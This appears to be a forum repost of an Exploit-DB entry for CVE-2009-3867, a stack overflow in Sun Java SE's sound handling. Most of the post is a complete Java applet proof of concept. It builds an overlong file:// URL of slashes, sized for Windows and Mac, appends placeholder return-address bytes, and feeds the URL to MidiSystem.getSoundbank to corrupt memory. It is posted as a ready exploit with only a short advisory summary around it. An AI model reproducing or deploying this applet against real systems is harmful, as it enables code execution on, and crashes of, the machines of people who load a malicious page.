Exploit Sun Java SE November 2009 - Multiple Vulnerabilities (1)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33315
Проверка EDB
  1. Пройдено
Автор
TOMETZKY
Тип уязвимости
REMOTE
Платформа
LINUX
CVE
cve-2009-3867
Дата публикации
2009-10-29
Java:
source: https://www.securityfocus.com/bid/36881/info

Sun has released updates to address multiple security vulnerabilities in Java SE.

Successful exploits may allow attackers to bypass certain security restrictions, run untrusted applets with elevated privileges, execute arbitrary code, and cause denial-of-service conditions. Other attacks are also possible.

These issues are addressed in the following releases:

JDK and JRE 6 Update 17
JDK and JRE 5.0 Update 22
SDK and JRE 1.4.2_24
SDK and JRE 1.3.1_27 

import java.awt.Graphics;
public class test extends java.applet.Applet {
        public static Synthesizer synth;
        Soundbank soundbank;

    	public void init() 
	{
		String fName = ""; 
		if(isWindows()){
			System.out.println("This is Windows");
			fName = repeat('/',302);
		}else if(isMac()){
			System.out.println("This is Mac");
			fName = repeat('/',1118); // OSX Snow Leopard
		}else if(isUnix()){
			System.out.println("This is Unix or Linux, no current test case");
		}else{
			System.out.println("Your OS is not supported!!");
		}
	
		CharArrayWriter pw = new CharArrayWriter(10);  
//		int retaddr[] = { 0x0d, 0x0d, 0x0d, 0x0d }; 
		int retaddr[] = { 0x41, 0x42, 0x43, 0x44, 0x30, 0x31, 0x32, 0x33, 0x0d, 0x0d, 0x0d, 0x0d }; 
		int retlen = java.lang.reflect.Array.getLength(retaddr);

		for(int x = 0; x < retlen; x++)
		{
			pw.write(retaddr[x]);
			pw.flush();
		}

	 	pw.close();
		String mal = pw.toString();  
  
  		fName = "file://" + fName + mal;
                try
		{
                        synth = MidiSystem.getSynthesizer();
                        synth.open();
                        synth.loadAllInstruments(MidiSystem.getSoundbank(new URL(fName)));
                }
                catch(Exception e)
		{
			System.out.println(e);
                }
    	}
    	public void paint(Graphics g) 
	{
		g.drawString("Hello world!", 50, 25);
    	}
	public static String repeat(char c,int i)
	{
        	String tst = "";
         	for(int j = 0; j < i; j++)
         	{
         		tst = tst+c;
         	}
        	return tst;
	}

	public static boolean isWindows(){
 
		String os = System.getProperty("os.name").toLowerCase();
		//windows
	    return (os.indexOf( "win" ) >= 0); 
 
	}
 
	public static boolean isMac(){
 
		String os = System.getProperty("os.name").toLowerCase();
		//Mac
	    return (os.indexOf( "mac" ) >= 0); 
 
	}
 
	public static boolean isUnix(){
 
		String os = System.getProperty("os.name").toLowerCase();
		//linux or unix
	    return (os.indexOf( "nix") >=0 || os.indexOf( "nux") >=0);
 
	}
}
 
Источник
www.exploit-db.com

Похожие темы